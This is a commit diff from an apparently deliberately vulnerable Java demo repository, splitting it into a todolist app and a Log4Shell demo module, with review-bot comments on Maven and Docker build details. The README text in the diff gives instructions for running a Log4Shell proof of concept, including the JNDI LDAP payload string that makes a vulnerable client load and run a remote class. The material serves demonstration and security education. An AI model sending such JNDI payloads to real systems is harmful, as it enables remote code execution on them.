broke dependency of child modules on root parent. moved Dockerfile into todolist-goof module. Updated todolist poms to reference correct versions in dependencies.
dogeared committed Dec 16, 2021
1 parent 9c0df1f commit 29b3e02
Showing 9 changed files with 18 additions and 117 deletions.
100 changes: 5 additions & 95 deletions README.md
@@ -1,98 +1,8 @@
## Log4Shell Proof of Concept
## Java Goof

The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
This is a collection of Java demo apps that are vulnerable in different ways.

This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
It's divided into modules, each one having its own README:

For more information about the exploit and the mechanics of how it works,
[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).

### Requirements

You'll need one of the following Java SDKs:
* 11.0.1 or earlier
* 8u191 or earlier
* 7u201 or earlier
* 6u211 or earlier

Java SDKs newer than those versions don't have the same vulnerability.

### Building the PoC

In the root folder, run:

```
./mvnw clean install
```

**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.

### Running the PoC

This repo has two modules: server and client.

The server module runs a lean LDAP & HTTP server.

The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a
Java class that will be deserialized and executed.

The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`.

`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While
the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it
writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine.

This PoC should run as-is on Linux or Mac.

Open a terminal window and run the following:

```
cd log4shell-server
../mvnw exec:java -Dexec.mainClass="Server"
```

You should see output that looks like the following:

```
[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server ---
LDAP server listening on 0.0.0.0:9999
HTTP server listening on 0.0.0.0:8000
```

In another terminal window, run the following:

```
cd log4shell-client
JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
../mvnw exec:java -Dexec.mainClass="Main"
```

**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
For example, you can download JDK 8u111
[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download
and install the version for Mac, the above command will work for you.

You should see output that looks like the following:

```
[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client ---
---------- JVM Props -------------
java.vm.version=25.111-b14
java.vm.vendor=Oracle Corporation
java.vm.name=Java HotSpot(TM) 64-Bit Server VM
java.vm.specification.name=Java Virtual Machine Specification
java.vm.specification.vendor=Oracle Corporation
java.vm.specification.version=1.8
java.vm.info=mixed mode
---------------------------------
20:27:49.676 [Main.main()] ERROR Main - test
/tmp/pwned DOES NOT EXIST
20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
/tmp/pwned EXISTS - yah been pwned!
```

**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the
`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
client app to work properly. The file not being there and then being present after the attack is how it knows it's
been successful.
* [Todolist Goof](todolist-goof/README.md)
* [Log4Shell Goof](log4shell-goof/README.md)
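Review bot: the new root README no longer says how to build anything, while the module READMEs keep "In the root folder, run:" before `mvn clean install`; since this same commit removes the `<parent>` reference to `java-goof` from both `log4shell-goof/pom.xml` and `todolist-goof/pom.xml`, a root-level build only still covers the modules if the root pom aggregates them as `<modules>`. Suggest one sentence under the module list stating that each module is now built from its own directory, or confirming that the root build still includes them.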
13 changes: 8 additions & 5 deletions log4shell-goof/README.md
@@ -1,7 +1,10 @@
## Log4Shell Proof of Concept
## Log4Shell Goof

The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.

This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.

For more information about the exploit and the mechanics of how it works,
[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).

@@ -20,7 +23,7 @@ Java SDKs newer than those versions don't have the same vulnerability.
In the root folder, run:

```
./mvnw clean install
mvn clean install
```

**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
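Review bot: the unchanged NOTE at the end of this hunk still says the project includes the Maven wrapper so Maven need not be installed, but the command above was changed from `./mvnw clean install` to `mvn clean install`, which does require a system Maven on the PATH. Either keep a wrapper invocation or update the NOTE to say Maven must be installed. "In the root folder, run:" is also ambiguous now that the module no longer inherits from the repository root pom; "In the `log4shell-goof` folder, run:" would be unambiguous.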
@@ -46,7 +49,7 @@ Open a terminal window and run the following:

```
cd log4shell-server
../mvnw exec:java -Dexec.mainClass="Server"
mvn exec:java -Dexec.mainClass="Server"
```

You should see output that looks like the following:
@@ -62,7 +65,7 @@ In another terminal window, run the following:
```
cd log4shell-client
JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
../mvnw exec:java -Dexec.mainClass="Main"
mvn exec:java -Dexec.mainClass="Main"
```

**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
@@ -92,4 +95,4 @@ java.vm.info=mixed mode
**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the
`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
client app to work properly. The file not being there and then being present after the attack is how it knows it's
been successful.
been successful.
Binary file not shown.
6 changes: 0 additions & 6 deletions log4shell-goof/pom.xml
@@ -2,12 +2,6 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<parent>
<artifactId>java-goof</artifactId>
<groupId>io.github.snyk</groupId>
<version>1.0-SNAPSHOT</version>
</parent>

<groupId>io.snyk</groupId>
<artifactId>log4shell-poc</artifactId>
<version>0.0.1-SNAPSHOT</version>
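Review bot: removing the `<parent>` drops whatever the `java-goof` root pom supplied by inheritance (properties such as compiler source and target, `dependencyManagement`, plugin versions), and nothing in this hunk re-declares it; please confirm the module's pom now carries its own compiler settings and pins the Log4j version the demo depends on (older than `2.15.0`, per the README in this commit). Separately, this module keeps `groupId` `io.snyk` while the parent it just dropped and the todolist modules use `io.github.snyk`; worth aligning while the file is being touched.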
4 changes: 2 additions & 2 deletions Dockerfile → todolist-goof/Dockerfile
@@ -8,7 +8,7 @@ RUN --mount=target=$HOME/.m2,type=cache mvn install
FROM tomcat:8.5.21

RUN mkdir /tmp/extracted_files
COPY --chown=tomcat:tomcat todolist-goof/web.xml /usr/local/tomcat/conf/web.xml
COPY --from=build /usr/src/goof/todolist-goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
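Review bot: the two changed `COPY` lines now assume the build context is `todolist-goof/` itself (`web.xml` at the context root, and the build stage output under `/usr/src/goof/todolist-web-struts/` rather than `/usr/src/goof/todolist-goof/todolist-web-struts/`), but the earlier build-stage lines that copy sources into `/usr/src/goof` sit above this hunk and are not shown; confirm they were adjusted to match, and document in `todolist-goof/README.md` that `docker build` is now run from that directory (or with it as the context), since the old top-level location no longer exists.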
2 changes: 1 addition & 1 deletion todolist-goof/README.md
@@ -1,4 +1,4 @@
## Java Goof
## Todolist Goof

A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc).

6 changes: 0 additions & 6 deletions todolist-goof/pom.xml
@@ -2,12 +2,6 @@
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<parent>
<artifactId>java-goof</artifactId>
<groupId>io.github.snyk</groupId>
<version>0.0.1-SNAPSHOT</version>
</parent>

<groupId>io.github.snyk</groupId>
<artifactId>todolist-mvc</artifactId>
<version>0.0.1-SNAPSHOT</version>
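Review bot: the removed `<parent>` pointed at `java-goof` `0.0.1-SNAPSHOT`, whereas the `<parent>` removed from `log4shell-goof/pom.xml` in this same commit pointed at `java-goof` `1.0-SNAPSHOT`, so the two modules were previously inheriting from different parent versions; deleting both resolves that, but `todolist-mvc` now inherits nothing, so check that the `<modules>` list, `dependencyManagement` and plugin configuration its sub-modules relied on are present in this pom (outside the hunk).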
2 changes: 1 addition & 1 deletion todolist-goof/todolist-web-common/pom.xml
@@ -38,7 +38,7 @@
<dependency>
<groupId>io.github.snyk</groupId>
<artifactId>todolist-core</artifactId>
<version>1.0-SNAPSHOT</version>
<version>0.0.1-SNAPSHOT</version>
</dependency>

<!-- javaee web api -->
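Review bot: the `todolist-core` dependency is corrected to `0.0.1-SNAPSHOT`, which matches the `todolist-mvc` version declared in `todolist-goof/pom.xml`; since the todolist sub-modules share that version, `<version>${project.version}</version>` would keep them in step on the next bump instead of requiring another hard-coded edit like this one.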
2 changes: 1 addition & 1 deletion todolist-goof/todolist-web-struts/pom.xml
@@ -21,7 +21,7 @@
<artifactId>javaee-web-api</artifactId>
</exclusion>
</exclusions>
<version>1.0-SNAPSHOT</version>
<version>0.0.1-SNAPSHOT</version>
</dependency>

<!-- javaee web api -->
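Review bot: same fix as in `todolist-web-common/pom.xml`; the dependency's `artifactId` is above this hunk and not shown, so confirm it is a sibling todolist module, in which case `${project.version}` applies here as well.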

0 comments on commit 29b3e02